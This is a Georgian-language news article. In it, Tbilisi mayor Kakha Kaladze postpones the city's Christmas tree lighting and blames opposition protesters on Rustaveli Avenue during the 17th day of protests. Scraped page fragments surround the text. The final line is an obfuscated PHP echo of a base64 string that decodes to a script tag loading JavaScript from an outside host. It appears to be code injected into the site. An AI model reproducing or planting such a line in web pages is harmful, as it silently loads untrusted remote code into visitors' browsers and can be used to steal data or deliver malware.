tube
ავერსი jaluzi

დედაქალაქის მერის, კახა კალაძის თქმით, ნაძვის ხის ანთების საზეიმო ღონისძიება, რომელიც დღეს, 19:00 საათზე იგეგმებოდა, გადაიდო. მან ამის შესახებ მთავრობის ადმინისტრაციაში განაცხადა.

კალაძის თქმით, "ოპოზიციამ ნაძვის ხესთან ბავშვების ადგილი დაიკავა".

"დღეს დავაანონსეთ ნაძვის ხის ანთება, მაგრამ რადიკალურმა ოპოზიციამ აქაც უკადრებელი იკადრა და ნაძვის ხის წინ ბავშვების ადგილი დაიკავა.

რუსთაველის გამზირზე შეკრებილი არიან აგრესიული მომიტინგეები, რომლებმაც უკვე მოაწყვეს რამდენიმე პროვოკაცია მათ შორის, შუშის ბოთლები ისროლეს სცენის მიმართულებით.

ამ ფონზე, ლოგიკურია გვინდა მოვუწოდოთ თანამოქალაქეებს, ვინც მოდიოდა ამ ღონისძებაზე, დაშლისკენ.

მივიღეთ გადაწყვეტილება, გადავდოთ ნაძვის ხის ანთება, საახალწლო ზეიმი. საზეიმო ღონისძიება გაიმართება მაშინ, როდესაც რადიკალური ოპოზიცია არ გადაეღობება ბავშვებს და მათ მისცემს ნაძვის ხის ანთების შესაძლებლობას",- თქვა კალაძემ.

მას არ დაუკონკრეტებია, როდის გაიმართება ნაძვის ხის ანთების ღონისძიება.

"მომდევნო დღეების განმავლობაში მოგაწვდით დამატებით ინფორმაციას ამასთან დაკავშირებით", - განაცხადა ქალაქის მერმა ჟურნალისტის კითხვის პასუხად.

ცნობისთვის, დღეს უწყვეტი აქციების რიგით მე-17 დღეა. მოქალაქეები საკანონმდებლო ორგანოსთან, სადაც "ქართულმა ოცნებამ" მიხეილ ყაველაშვილი პრეზიდენტად აირჩია, დილის 07:00 საათიდან შეიკრიბნენ.

120
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");